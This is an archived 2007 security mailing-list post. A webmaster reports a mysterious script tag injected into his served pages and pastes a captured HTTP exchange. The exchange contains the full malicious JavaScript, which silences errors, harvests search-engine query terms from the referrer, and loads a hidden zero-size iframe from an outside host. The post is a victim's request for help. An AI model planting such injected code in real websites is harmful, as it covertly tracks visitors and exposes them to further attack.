Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

been hacked ?

From: "d3l user" <d3luser () gmail com>
Date: Wed, 30 May 2007 13:20:28 +0200
while browsing through a web page hosted on my web server I have seen
in the firefox page source the following line:

<script src="http://wymiana.org/stat/script_vip.php?user=2254 "></script>


subsequently I have opened with vim the file index.php located on the server,
and there's no trace about that line . This happens also wit static html pages.


any idea about ?


following you can find the tcpdum stream


thanks in advance,

delUser





GET /mystat/2.js?host=wymiana.org HTTP/1.1

Host: rejestr.org

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3)
Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)

Accept: */*

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.mywebsite.com/



HTTP/1.1 200 OK

Date: Tue, 29 May 2007 19:46:27 GMT

Server: Apache/1.3.36 (Unix) mod_auth_passthrough/1.8
mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 mod_ssl/2.8.27
OpenSSL/0.9.7a

X-Powered-By: PHP/4.4.2

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



53d

function stopErrors(){return true;}window.onerror=stopErrors;
function getJS(v,r)
{
q = r.toString ();
var p = q.indexOf('?');
if (p > 0) {q = q.substring(p+1);}
var vs = q.split("&");
for (var i=0;i<vs.length;i++)
{
var pr = vs[i].split("=");
if (pr[0] == v) {return pr[1];}
}
}
var q="";
var r="";
try {
if (top.document.referrer) {r=top.document.referrer;}
else if (document.referrer)  {r=document.referrer;};
}catch (e) {};
if (r !=="")
{
if (r.indexOf("google.") !== -1) {q="q";};
if (r.indexOf("msn.com") !== -1) {q="q";};
if (r.indexOf("altavista.") !== -1) {q="q";};
if (r.indexOf("yahoo.") !== -1) {q="p";};
if (r.indexOf("netsprint.") !== -1) {q="q";};
if (r.indexOf("onet.pl") !== -1) {q="qt";};
if (r.indexOf(" wp.pl") !== -1) {q="szukaj";};
if (r.indexOf("interia.pl") !== -1) {q="q";};
if (r.indexOf("szukacz.pl") !== -1) {q="q";};
if (r.indexOf("o2.pl") !== -1) {q="qt";};
}
var vars="";
if ((r !=="") && (q!==""))
{
vars=getJS(q,r);
}
if (vars=="undefined") {vars="";};
if (vars!=="") {vars=vars +"&src=se";};
if (vars!==""){
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=\"http://rejestr.org/mystat/2.php?id="+self.location+"&topkey="+vars+"\";></iframe>")

}else
document.write("<iframe frameborder=0 style='width:0px; height:0px'
src=http://rejestr.org/mystat/2.php?id="+self.location+";></iframe>")


0
Previous By Date Next
Previous By Thread Next

Current thread: